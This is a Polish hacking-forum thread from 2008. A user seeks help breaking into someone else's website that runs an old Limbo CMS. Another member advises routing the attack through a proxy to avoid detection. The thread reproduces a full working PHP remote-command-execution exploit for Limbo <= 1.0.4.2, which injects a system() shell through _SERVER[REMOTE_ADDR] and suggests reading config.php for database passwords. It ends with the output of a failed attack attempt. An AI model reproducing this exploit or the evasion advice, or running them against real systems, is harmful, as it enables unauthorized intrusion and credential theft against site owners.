exploit limbo

krzywomordus · Marzec 13, 2008

Znam pewną stronę, która korzysta ze staaaaarego limbo i chce pokazac, ze czas juz to zmienic XD
Mam też fajny exploit.php, wypelnilem wszystkie pola oprocz " send exploit through an HTTP proxy(ip

ort) "
Mam wpisać swoje ip (tzn. serwera z ktorego to robie)?
ip tej strony, na ktorej chce zrobic wlam?
Na innych forach nie bede o to pytac, bo regulamin tam zabrania, ale tutaj chyba moge XD.
Więc?

pozdrawiam

____________krzywomordus

sinis · Marzec 13, 2008

Originally posted by krzywomordus
send exploit through an HTTP proxy(iport)

To oznacza "Wyślij exploita przez proxy HTTP (ip

ort)". Czyli szukasz sobie proxy na http://proxy.net.pl/ i w to pole wpisujesz "<ip proxy>:<port na którym działa proxy>".

krzywomordus · Marzec 13, 2008

Wiem co to oznacza ;]
Ale:
Co oznacza "szukasz sobie proxy na" na dole w pole"Sprawdź Proxy" wpisuję ip serwera ze starym limbo, a proxy mam strzelac?
Mam swoje ip wpisac i proxy tez mam strzelac?
Co i gdzie mam wpisać?
Po co wogóle to proxy :kreci: ? ;]

______________
krzywomordus

sinis · Marzec 13, 2008

http://proxy.net.pl/proxy1.html <- tu masz listę, wybierz sobie jakieś i wpisz co trzeba.

Po co wogóle to proxy :kreci: ? ;][/b]

Żeby ograniczyć ryzyko wykrycia Cię...

krzywomordus · Marzec 13, 2008

Ale problem polega na tym, że nie robię włamu ze swojego kompa... potrzebowałbym do tego apache, php, a nie chce mi sie grzebac w tym, wiec robie to z innego serwera (tam wsadzilem pliki przez ftp)...
Czy koniecznie muszę wpisywac coś w to pole?
Kiedy nic tam nie wpisuję, to 'włam' się nie udaje.
A dostępu fizycznego do tego serwera nie mam, robię to przez panel administracyjny.

EDIT: OK, już wiem o co chodzi, ale kiedy wpisuję DZIAŁAJĄCY proxy, to i tak nie chce iść

sinis · Marzec 13, 2008

Hmmm... Wrzuć tu kod tego exploita.

krzywomordus · Marzec 13, 2008

Originally posted by sinis
Hmmm... Wrzuć tu kod tego exploita.

Prrroszę bardzo:

Kod:

<?php

#  ---limbo_1042_eval_xpl.php                             16.03 14/12/2005     #

#                                                                              #

#  Limbo <= 1.0.4.2 _SERVER[REMOTE_ADDR] overwrite/ remote cmmnds xctn         #

#                              coded by rgod                                   #

#                    site: [url]http://rgod.altervista.org                          #[/url]

#                                                                              #

#  -> this works wtih register_globals off & regardless of magic_quotes_gpc    #

#  settings                                                                    #

#  usage: launch from Apache, fill in requested fields, then go!               #

#                                                                              #

#  Sun-Tzu: "Humble words and increased preparations are signs that the enemy  #

#  is about to advance.  Violent language and driving forward as if to the     #

#  attack are signs that he will retreat.                                      #



error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout", 5);

ob_implicit_flush (1);



echo'<html><head><title>Limbo <= 1.0.4.2 _SERVER[REMOTE_ADDR] remote cmmnds xctn

</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<style type="text/css"> body {background-color:#111111;   SCROLLBAR-ARROW-COLOR:

#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img

{background-color:   #FFFFFF   !important}  input  {background-color:    #303030

!important} option {  background-color:   #303030   !important}         textarea

{background-color: #303030 !important} input {color: #1CB081 !important}  option

{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox

{background-color: #303030 !important} select {font-weight: normal;       color:

#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;

background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:

0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em

!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em

!important}     h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em

!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:

normal !important} *{text-decoration: none !important} a:link,a:active,a:visited

{ text-decoration: none; color : #99aa33; } a:hover{text-decoration: underline;

color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;

font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;

font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">

Limbo <= 1.0.4.2 _SERVER[REMOTE_ADDR] remote cmmnds xctn</p><p class="Stile6"> a

script  by  rgod  at        <a href="http://rgod.altervista.org"target="_blank">

http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%">  <form

name="form1" method="post" action="'.strip_tags($_SERVER[PHP_SELF]).'">

<input

type="text"  name="host"> * hostname  (ex:[url]www.sitename.com[/url])

</p> 

<input type="text" name="path">  * path (ex:

/limbo/  or just / ) </p>

<input type="text" name="command">      
class="Stile5"> * specify a command ("cat config.php" to see database username &

password)</p>

<input type="text" name="port">     

specify  a  port   other   than  80 ( default  value )  </p>  

  <input

type="text"   name="proxy">        send  exploit through an

HTTP proxy(ip:port)</p>

<input type="submit" name="Submit" value="go!">

</p></form></td></tr></table></body></html>';



function show($headeri)

{

$ii=0;

$ji=0;

$ki=0;

$ci=0;

echo '<table border="0"><tr>';

while ($ii <= strlen($headeri)-1)

{

$datai=dechex(ord($headeri[$ii]));

if ($ji==16) {

             $ji=0;

             $ci++;

             echo "<td></td>";

             for ($li=0; $li<=15; $li++)

                      { echo "<td>".$headeri[$li+$ki]."</td>";

                }

            $ki=$ki+16;

            echo "</tr><tr>";

            }

if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else

{echo "<td>".$datai."</td> ";}

$ii++;

$ji++;

}

for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)

                      { echo "<td>&nbsp&nbsp</td>";

                       }



for ($li=$ci*16; $li<=strlen($headeri); $li++)

                      { echo "<td>".$headeri[$li]."</td>";

                }

echo "</tr></table>";

}

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';



function sendpacket() //if you have sockets module loaded, 2x speed! if not,load

                      //next function to send packets

{

  global $proxy, $host, $port, $packet, $html, $proxy_regex;

  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);

  if ($socket < 0) {

                   echo "socket_create() failed: reason: " . socket_strerror($socket) . "
";

                   }

          else

           {   $c = preg_match($proxy_regex,$proxy);

              if (!$c) {echo 'Not a valid prozy...';

                        die;

                       }

                    echo "OK.
";

                    echo "Attempting to connect to ".$host." on port ".$port."...
";

                    if ($proxy=='')

           {

             $result = socket_connect($socket, $host, $port);

           }

           else

           {



           $parts =explode(':',$proxy);

                   echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';

           $result = socket_connect($socket, $parts[0],$parts[1]);

           }

           if ($result < 0) {

                                     echo "socket_connect() failed.rnReason: (".$result.") " . socket_strerror($result) . "

";

                                    }

                           else

                            {

                                     echo "OK.

";

                                     $html= '';

                                     socket_write($socket, $packet, strlen($packet));

                                     echo "Reading response:
";

                                     while ($out= socket_read($socket, 2048)) {$html.=$out;}

                                     echo nl2br(htmlentities($html));

                                     echo "Closing socket...";

                                     socket_close($socket);



                    }

                  }

}

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='')

      {$ock=fsockopen(gethostbyname($host),$port);

       if (!$ock) { echo 'No response from '.htmlentities($host);

            die; }

      }

             else

           {

       $c = preg_match($proxy_regex,$proxy);

              if (!$c) {echo 'Not a valid prozy...';

                        die;

                       }

       $parts=explode(':',$proxy);

        echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';

        $ock=fsockopen($parts[0],$parts[1]);

        if (!$ock) { echo 'No response from proxy...';

            die;

               }

       }

fputs($ock,$packet);

if ($proxy=='')

  {



    $html='';

    while (!feof($ock))

      {

        $html.=fgets($ock);

      }

  }

else

  {

    $html='';

    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))

    {

      $html.=fread($ock,1);

    }

  }

fclose($ock);

echo nl2br(htmlentities($html));

}



$host=$_POST[host];

$path=$_POST[path];

$command=$_POST[command];

$port=$_POST[port];

$proxy=$_POST[proxy];



if (($host<>'') and ($path<>'') and ($command<>''))

{

  $port=intval(trim($port));

  if ($port=='') {$port=80;}

  if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}

  if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

  $host=str_replace("rn","",$host);

  $path=str_replace("rn","",$path);

  # STEP X -> one and unique...

  # we overwrite ip address, include classes/adodbt/read_table.php and pass commands to an eval()

  $SHELL="'.ini_set("max_execution_time",0).system($_GET[cmd]).die('HiMaster!').'";

  $SHELL=urlencode($SHELL);

  $packet="GET ".$p."index2.php?cmd=".urlencode($command)."&_SERVER[]=&_SERVER[REMOTE_ADDR]=";

  $packet.=$SHELL;

  $packet.="&option=wrapper&module[module]=1 HTTP/1.1rn";

  $packet.="User-Agent: Googlebot/2.1rn";

  $packet.="Host: ".$host."rn";

  $packet.="Connection: Closernrn";

  show($packet);

  sendpacketii($packet);

  if (eregi("HiMaster!",$html)) {echo "Exploit succeeded...";}

                           else {echo "Exploit failed...";}

}

else

{echo "Fill * required fields, optionally specify a proxy...";}

?>



# milw0rm.com [2005-12-14]

[ Dodano: 13-03-2008, 18:28 ]
Prawie zadziałało: dałem jakiś działający proxy, ale niestety wywala
Connecting to 85.214.77.184:80 proxy...
HTTP/1.1 401 Unauthorized
Connection: close
WWW-Authenticate: Basic realm="Password protected area"
Content-Type: text/html
Content-Length: 351
Date: Thu, 13 Mar 2008 17:29:25 GMT
Server: lighttpd/1.4.13

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>401 - Unauthorized</title>
</head>
<body>
<h1>401 - Unauthorized</h1>
</body>
</html>
Exploit failed... # milw0rm.com [2005-12-14]

A już myślałem że się uda... ;]

exploit limbo

krzywomordus

Użytkownik

sinis

Użytkownik

krzywomordus

Użytkownik

sinis

Użytkownik

krzywomordus

Użytkownik

sinis

Użytkownik

krzywomordus

Użytkownik